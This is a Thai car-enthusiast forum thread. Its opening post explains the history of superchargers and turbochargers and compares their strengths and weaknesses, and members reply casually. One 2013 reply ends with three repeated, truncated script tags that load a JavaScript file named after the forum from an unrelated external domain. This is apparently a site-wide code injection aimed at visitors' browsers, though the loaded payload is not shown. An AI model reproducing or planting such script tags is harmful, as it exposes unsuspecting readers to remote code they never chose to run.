ตอบ
poom606


ชื่อเล่น: ภูมิ

เข้าร่วม: 27 มีนา 2010
ตอบ: 24

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 85

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 28 มีนา 2010 18:50 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
“เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”

Credit คุณ 666 จาก one2car พิมพ์ว่า:
บังเอิญว่าเมื่อปลายเดือนที่แล้วแอบไปได้ยิน…เอ..ไม่น่าจะเรียกว่าแอบนะเพราะดูท่านจะคุยกันเสียงดังจงใจให้คนอื่นได้ยินมากกว่า เท่าที่สดับรับฟังพอจะจับใจความได้ว่า หนึ่งในกลุ่มนั้นกำลังวางแผนผลาญเงินบิดา-มารดา..เฮ้ย..วางแผนวางเครื่องใหม่และได้รับการแนะนำจากช่างว่าให้วางเครื่องซุปเปอร์ชาร์จเพราะมันเจ๋ง..แล้วท่านทั้งหลายก็ถกเถียงกัน..เฮ้ย..แลกเปลี่ยนข้อคิดเห็นกันระหว่างเครื่องที่เป็นซุปเปอร์ชาร์จกับเทอร์โบว่าใครเจ๋งกว่ากัน



แต่…แต่..บังเอิญอีกแหละที่ผมก็กรึ่มเต็มที่แล้วเลยไม่กล้าไปแสดงความคิดเห็นร่วมกับท่าน สุดท้ายในกลุ่มของท่านก็ยังไม่ได้ข้อสรุป ทำไมนั้นหรือ..เห่อๆๆๆผมก็พึ่งทราบเหมือนกันว่ายังมีการเข้าใจอะไรที่ไม่ตรงกับความเป็นจริงมากขนาดนี้ ขนาดว่ารักความแรงแต่ไม่ยอมศึกษาให้ดีก่อนก็ไม่รู้จะว่ายังไง



หลังจากวันนั้นเลยรู้สึกหงุดหงิดคันไม้คันมือยังไงบอกไม่ถูกเลยขออนุญาตินำเรื่องนี้มาเขียนเล่าสู่กันฟังก่อนเรื่องอื่นๆที่รับปากเอาไว้ก่อนที่อีกหลายๆคนจะตกเป็นเหยื่อ….



ความเป็นมา



เป็นความพยามของมนุษย์ที่ต้องการเพิ่มแรงให้กับเครื่องยนต์ซึ่งพอจะแยกได้ 2อย่างคือ การเพิ่มกำลังอัดกับเพิ่มส่วนผสมไอดี แต่การเพิ่มกำลังอัดถูกจำกัดด้วยคุณภาพและปริมาณของเชื้อเพลิง ส่วนการเพิ่มส่วนผสมไอดีแรกๆก็ออกมาในรูปของการเพิ่มความจุกระบอกสูบที่ถูกจำกัดด้วยขนาดและน้ำหนักของเครื่องยนต์ จนมีกี่คิดค้นการเพิ่มอากาศโดยการอัดอากาศเข้าไปในห้องเผาไม้ที่เรียกว่าซุปเปอร์ชาร์จ



ซุปเปอร์ชาร์จคืออะไร???



ถ้าย้อนไปก่อนปี 1900 ไม่ได้พิมพ์ผิดนะครับเพราะเท่าที่ทราบมีการจดลิขสิทธิ์ครั้งแรกเมื่อ 1865 แต่การเพิ่มอากาศหรือซุปเปอร์ชาร์จนั้นจะใช้งานอยู่กับเครื่องบินเป็นส่วนใหญ่และมาโด่งดังหลังจากเลิกใช้งานกับเครื่องบินแล้วนำมาใช้งานกับรถยนต์ในวงการรถแข่งราว 1925-1927



ซุปเปอร์ชาร์จหรือซุปเปอร์ชาร์จเจอร์(Supercharger) อธิบายง่ายๆว่ามันคืออุปกรณ์ที่ทำหน้าที่อัดอากาศหรือเพิ่มปริมาณอากาศเข้าไปในห้องเผาไหม้ในปริมาณที่มากกว่าปกติหรือมากกว่าแรงดันบรรยากาศโดยการใช้กำลังของเครื่องยนต์จากเพลาข้อเหวี่ยงเป็นตัวหมุนตัวอัดอากาศผ่านสายพานหรือชุดเฟืองหรือชุดเกียร์เพื่อทำให้อากาศจากบริเวณรอบๆมีแรงดันที่สูงขึ้นและมีอัตราไหลที่แรงและเร็วขึ้นตามรอบการหมุนของเครื่องยนต์ซึ่งมันจะมีด้านเดียวคือเฉพาะด้านอัดอากาศหรือคอมเพรสเซอร์เท่านั้น



ข้อดีของซุปเปอร์ชาร์จคือ





การตอบสนองเป็นไปตามรอบเครื่องยนต์ตั้งแต่เครื่องยนต์เริ่มหมุน

อุปกรณ์ที่ใช้มีขนาดเล็กไม่เปลืองพื้นที่ติดตั้งง่ายน้ำหนักเบาสวยงาม

ดูแลรักษาง่ายความทนทานสูง


ข้อที่ไม่ค่อยดีนักของซุปเปอร์ชาร์จคือ





ต้องใช้กำลังของเครื่องยนต์มาปั่นใบพัดจึงสิ้นเปลืองเชื้อเพลิงมาก(เหมือนกันติดแอร์นั่นแหละ)

กำลังที่ได้ถูกจำกัดในระดับหนึ่งเท่านั้นทั้งรอบต่ำและรอบสูงโดยมีรอบเครื่องยนต์เป็นตัวแปร


แล้วเทอร์โบละคืออะไร???



ถ้าจะเอาชื่อจริงๆแบบดังเดิมแล้วเทอร์โบนั้นก็คือ เทอร์โบซุปเปอร์ชาร์จเจอร์(Turbo-Supercharger) นั่นเอง ซึ่งต่อๆมาเรียกสั้นลงเหลือแค่เทอร์โบชาร์จ และเหลือเฉพาะคำว่าเทอร์โบ อย่างเดียวดังที่เรียกขานกันในปัจจุบัน แท้ที่จริงแล้วเทอร์โบนั้นถูกพัฒนาคิดค้นมาจากซุปเปอร์ชาร์จนั่นแหละเพราะมันประกาศออกมาหลังการทดลองได้ผมเมื่อปี 1905 ว่านี่คือเทอร์โบซุปเปอร์ชาร์จเจอร์แต่กว่ามันจะได้รับความนิยมก็ราว 1952แล้ว ดังนั้นเทอร์โบมันก็เป็นซุปเปอร์ชาร์จชนิดหนึ่งนั่นแหละเพียงแต่แทนที่มันจะใช้กำลังของเครื่องยนต์มาปั่นแกนเพื่ออัดอากาศเข้าเครื่อง มันก็เพิ่มแกนอีกด้านมาต่อใบพัดเข้าไปแล้วนำไอเสียมาหมุนแกนที่อีกด้านยังคงเป็นซุปเปอร์ชาร์จหรืออัดอากาศเข้าเครื่องยนต์นั่นเอง



ข้อดีของเทอร์โบคือ





ได้แรงอัดที่สูงกว่าการใช้ซุปเปอร์ชาร์จธรรมดา

ประหยัดเชื้อเพลิงกว่าเพราะไม่ต้องอาศัยแรงเครื่องยนต์มาหมุนแต่ใช้ไอเสียที่ปล่อยทิ้งแทน


ข้อที่ไม่ดีนักของเทอร์โบคือ





ปริมาณและความสกปรกของไอเสียส่งผมต่อการทำงานของระบบ

ความเร็วในการหมุนแกนสูงถ้าเกิดข้อผิดพราดของระบบควบคุมการเสียหายจะเกิดได้ง่าย

การตอบสนองยังต้องรอแรงดันให้ได้ตามกำหนดก่อน


แล้วใครเจ๊งกว่ากันหละ???



อันนี้ถ้าจะพูดเรื่องความแรงอย่างเดียวเทอร์โบนั้นออกจะได้เปรียบซุปเปอร์ชาร์จอยู่เยอะเพราะมันใช้แรงดันไอเสียมาปั่นแกนดังนั้นการกำนหดแรงจึงทำได้ดีกว่าซุปเปอร์ชาร์จธรรมดาแบบเดิมๆด้านเดียวที่ยังคงอาศัยกำลังเครื่องยนต์เป็นพื้นฐานแม้ว่าจะมีการทดรอบอะไรแล้วก็ยังคงเปลืองกำลังของเครื่องยนต์อยู่ แต่ถ้าพูดเรื่องความทนทานดูแลง่ายแล้วซุปเปอร์ชาร์จแกนด้านเดียวจะทนทานดูแลง่ายกว่าเทอร์โบเยอะ แต่ถ้าพูดเรื่องอัตราบริโภคเทอร์โบจะได้เปรียบหน่อยเพราะอาศัยไอเสียที่ยังไงก็จะปล่อยทิ้งอยู่แล้วกลับมารีไซค์เคิลใหม่เพื่อนำมาหมุนแกนด้านเทอร์ไบที่แกนเดียวกันต่ออีกด้านเป็นคอมเพรสเซอร์ไว้อัดอากาศเข้าเครื่องยนต์ แม้ว่าซุเปอร์ชาร์จจะเรี่ยวแรงไม่ดีนักและสิ้นเปลืองกว่าแต่ความทนทานที่เหนือกว่าตลอดจนเรี่ยวแรงถ้าเทียบกับเครื่องยนต์ธรรมดาก็ดีกว่าเยอะเทียบอัตราส่วนการบริโภคกับกำลังงานที่ให้ก็ยังจัดว่าคุ้มค่า(เคยเขียนไปแล้วที่บทความเรื่อง”เทอร์โบร์ใครว่าซดผมว่ามันประหยัดนะ”)จึงยังมีรถยนต์หลายยี่ห้อยังคงใช้ซุปเปอร์ชาร์จอยู่เช่นเบนซ์รุ่นที่มีคำว่าคอมเพรสเซอร์ หรือคอม หรือคอมไบ ในหลายๆรุ่นหลายยี่ห้อ และในปัจจุบันก็มีการพัฒนาไปมากไม่ว่าจะมีการเปลี่ยนจากกำลังขับจากเครื่องยนต์มาเป็นไฟฟ้าหรือไฮโรลิกส์หรืออื่นๆอีกมากมายก็ยังคงอยู่ในพื้นฐานเดียวกัน และทั้งหมดไม่ว่าจะเป็นเทอร์โบหรือซุปเปอร์ชาร์จแท้ที่จริงแล้วมันก็มาจากที่มาเดียวกันคือ ซุปเปอร์ชาร์จครับ



สรุป



ที่ท่านพูดคุยกันวันนั้น..เห่อๆๆถ้าจำได้อาจจะรู้แล้วว่าผมเป็นใคร…เท่าที่จับใจความได้คือท่านถูกชี้แนะจากช่างที่ท่านจะไปวางเครื่องให้วางเครื่องซุปเปอร์ชาร์จที่ช่างมีเครื่องอยู่แล้วก็เลยเชียร์ท่านเต็มที่แถมให้ข้อมูลท่านมาแบบว่า…พูดก็พูดเถอะ..มันทำให้ผมสำรักเบียร์เลยแหละ ตอนนี้ก็ไม่ทราบว่าท่านไปวางมาหรือยังนะครับ ไม่ใช่ว่ามันไม่ดีนะครับแต่ถ้าพูดถึงความคุ้มค่าแล้วถ้ารักจะแรงจริงๆยังไงสิ่งที่พัฒนาทีหลังมันก็ย่อมดีกว่าสิ่งที่เป็นต้นแบบครับ เอ้า..ไหนๆก็ไหนๆแล้วขอพูดเรื่องการติดตั้งและเลือกน้องโบนิดนึงว่า โดยทั่วไปเท่าที่เห็นส่วนมากเครื่องเดิมๆมักจะได้รับคำแนะนำจาก..จากไหนก็ไม่รู้..ว่าไปเอาโบตัวนั้นตัวนี้มาติดหรือหอยตัวนั้นตัวนี้เจ๋งหรือหอยเดิมๆมันเล็กต้องไปหาหอยใหญ่ๆของเครื่องที่โตขึ้นไปมาใส่ ก็อยากฝากไว้เป็นข้อคิดนิดนึงว่าถ้าจะเลือกใช้หอยหรืออยากคบน้องโบถ้าไม่รู้แบบลึกจริงๆขอให้มองไปที่เครื่องขนาดเดียวกันซีรี่เดียวกันที่มีหอยมาด้วยเอาแค่นั้นมาติดก็พอครับเพราะยังไงถนนบ้านเรามันก็หาเส้นทางที่รองรับแรงจริงๆไม่ได้อยู่แล้ว เพราะการคิดค้นหอยแต่ละลูกออกมาเพื่อให้เข้ากับเครื่องยนต์นั้นเขาคำณวนกันมาโดยวิศวกรคิดกันหัวแทบระเบิดกว่าจะได้มันมาแล้วท่านคิดจะจับตัวไหนมายัดใส่เลยนั่นมีแต่พังกับพังครับ ถ้าจะลงลึกรายละเอียดจริงๆการเลือกหอยนั้นมีสูตรคำณวนครับแต่ที่คุยๆกันนั้นก็มีแค่ค่า A/R ที่เห็นคุยกันจังค่าเท่านั้นเท่านี้..เห่อๆๆๆมันไม่ได้มีแค่นั้นหรอกครับมันยังมี Turbo Mapหรือตารางเข้ามาหาจุดและค่าต่างๆอีกนี่ยังไม่พูดถึงCFM/Surge/Tและฯลฯ อื่นๆอีกมากมาย มันไม่ได้ง่ายอย่างที่คิดหรอกครับเอาแค่Turbo Mapอย่างเดียวก็พอ ว่างๆก่อนจะไปวางเครื่องลองถามไถ่ช่างหน่อยซิครับ..ไม่ใช่ว่าดูถูกนะครับ..แต่มีช่างซักกี่คนที่รู้จักหรือดูมันเป็น???



และ…และ…ขอเรียนว่าเครื่องยนต์ที่มีการเพิ่มปริมาณอากาศเข้าเครื่องมากกว่าปกติหรือมาการติดตั้งอุปกรณ์เพิมอากาศเข้ามานั้นคือซุปเปอร์ชาร์จทั้งหมดครับ เทอร์โบก็เป็นชนิดหนึ่งของซุปเปอร์ชาร์จครับ คุณสามารถเรียกเครื่องยนต์ทุกตัวที่มีการติดตั้งระบบเพิ่มอากาศเข้ามาในระบบมากกว่าปกติว่าซุปเปอร์ชาร์จได้ทั้งนั้นครับเพราะเทอร์โบชื่อจริงๆมันก็คือ เทอร์โบซุปเปอร์ชาร์เจอร์นั่นเองเพียงแต่มันยาวเลยเรียกสั้นๆกันแค่เทอร์โบ รู้อย่างนี้แล้ววันหลังจะคุยอะไรกันก็ให้มันเบาๆหน่อยนะครับเผื่อว่าจะมีคนที่รู้เรื่องจริงๆอยู่แถวๆนั้น!…เห่อๆๆๆดีนะที่ผมไม่ค่อยจะรู้อะไรเลยแถมกรึ่มเต็มที่แล้วเลยไม่ได้ไปขัดคอ..เฮ้ย..ไปร่วมแสดงความคิดเห็นด้วย..แล้วถ้าไปเจอคนอื่นเข้าหละ..คงมีชกหน้ากันบ้างละงานนี้???



คงแค่หอมปากหอมคอแค่นี้นะครับ เผื่อสำหรับท่านที่ยังไม่ทราบก็แล้วกันวันข้างหน้าอาจจะพอเป็นแนวทางยามคิดจะวางเครื่องแรกอย่างน้อยที่สุดก็พอจะเอาไว้วัดกึ๋นหรือจับผิดช่างที่จะวางเครื่องให้ว่าโม้อย่างเดียวหรือรู้จริงแค่ไหน…แฮะๆ..ความจริงเขียนเรื่องนี้ก็ชักมันสสสส์เหมือนกันแต่เวลาที่มีจำกัดแถมยังลัดคิวมาเขียนอีก…เอาเป็นว่าถ้ามีโอกาสวันหน้าจะมาต่อภาคสองเรื่องเกี่ยวกับเทอร์โบที่ลงรายละเอียดหน่อยหรืออาจจะแถมไลท์เทอร์โบให้ด้วย เอาไว้ถ้ามีโอกาสหรือมีคนสนใจมากแล้วจะมาเล่าสู่กันฟังใหม่ครับ ตอนนี้ก็เอาแค่เรื่องพื้นฐานความรู้รอบตัวไปก่อนก็แล้วกันนะครับ..อุอุ..ไม่แน่ใจเหมือนกันว่าเรื่องนี้จะเป็นที่น่าสนใจหรือได้อะไรไปจากการอ่านเรื่องนี้หรือเปล่า

Credit คุณ 666 จาก one2car


Attached File :
“เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
ได้รับคำขอบคุณจาก: aonrx  nandevil  TanKrab 
poom606


ชื่อเล่น: ภูมิ

เข้าร่วม: 27 มีนา 2010
ตอบ: 24

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 85

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 28 มีนา 2010 18:52 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
ผมเป็นสมาชิกใหม่นะคับ

ฝากเนื้อฝากตัวด้วยคับ

เด่วพุ่งนี้เอา es04 มาให้ชม

อิอิ
dogtown


ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

ที่อยู่: บางปะกอก ฝั่งธน
ปี: 2001
อาทิตย์, 28 มีนา 2010 18:55 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
เรื่องแบบนี้ยังไงก็ต้องอยู่กับความชอบ และ แนวการแต่งหนะครับ!! ตามความคิดผมนะ
poom606


ชื่อเล่น: ภูมิ

เข้าร่วม: 27 มีนา 2010
ตอบ: 24

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 85

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 28 มีนา 2010 18:58 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
dogtown พิมพ์ว่า:
เรื่องแบบนี้ยังไงก็ต้องอยู่กับความชอบ และ แนวการแต่งหนะครับ!! ตามความคิดผมนะ


ผมแค่อยากโพสอะไรที่เป็นประโยชน์อ่ะคับ

คงไม่ว่ากันนะ

มือใหม่คับ
dogtown


ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

ที่อยู่: บางปะกอก ฝั่งธน
ปี: 2001
อาทิตย์, 28 มีนา 2010 19:02 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
poom606 พิมพ์ว่า:
dogtown พิมพ์ว่า:
เรื่องแบบนี้ยังไงก็ต้องอยู่กับความชอบ และ แนวการแต่งหนะครับ!! ตามความคิดผมนะ


ผมแค่อยากโพสอะไรที่เป็นประโยชน์อ่ะคับ

คงไม่ว่ากันนะ

มือใหม่คับ
.


ผมไม่ได้ว่าอะไรคร้าบบบบ ผมเองก็หน้าใหม่เหมือนกัน อิอิ
ได้รับคำขอบคุณจาก: poom606 
koonaea


ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 28 มีนา 2010 19:10 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
รอชมรถกันดีกว่าครับ อย่าดครียดๆ

มีรถหลายๆแนวทางก็ดีนะครับ ได้มาแชร์กันไงครับ

ได้รับคำขอบคุณจาก: poom606 
josho


เข้าร่วม: 25 มิถุนา 2012
ตอบ: 813

Guru ES
Guru ES

ได้รับคำขอบคุณ: 397
ให้คำขอบคุณ: 0

ที่อยู่: ปทุมธานี
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 30 ตุลา 2013 11:12 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
ชอบๆๆ พี่คนนี้ไม่ธรรมดาคับ
lupinexe


ชื่อเล่น: เดียร์

เข้าร่วม: 26 ตุลา 2013
ตอบ: 146

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 74
ให้คำขอบคุณ: 15

ที่อยู่: รามอินทรา
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 30 ตุลา 2013 11:16 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
Supercharger ครับ เพราะ ทอเร็ตโต้ ชนะตลอดตั้งแต่ภาคแรก<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 31 ตุลา 2013 00:53 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
คนละแนวกันครับ
Supercharge. เหมาะกับ เพิ่มอัตราเร่งไม่มากเท่าไหร่. พอหอมปากหอมคอ. มีลิมิต
Turbo ไม่มีลิมิต. ชีวิตเกินแสน. พังได้เรื่อยๆ. ผมหมายถึง มันต่อยอดได้เรื่อยๆ
pukzone


เข้าร่วม: 11 ตุลา 2011
ตอบ: 721

Guru ES
Guru ES

ได้รับคำขอบคุณ: 708
ให้คำขอบคุณ: 184

ที่อยู่: กทม.
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 31 ตุลา 2013 06:52 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
..
Parongong


ชื่อเล่น: เว่อร์

เข้าร่วม: 08 กันยา 2013
ตอบ: 518

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 462
ให้คำขอบคุณ: 11

ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 31 ตุลา 2013 07:16 - “เทอร์โบนะเหรอ..โด่..จอก..ต้องซุปเปอร์ชาร์จซิเจ๋ง”
เข้ามาชมรับความรู้เฉยๆครับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.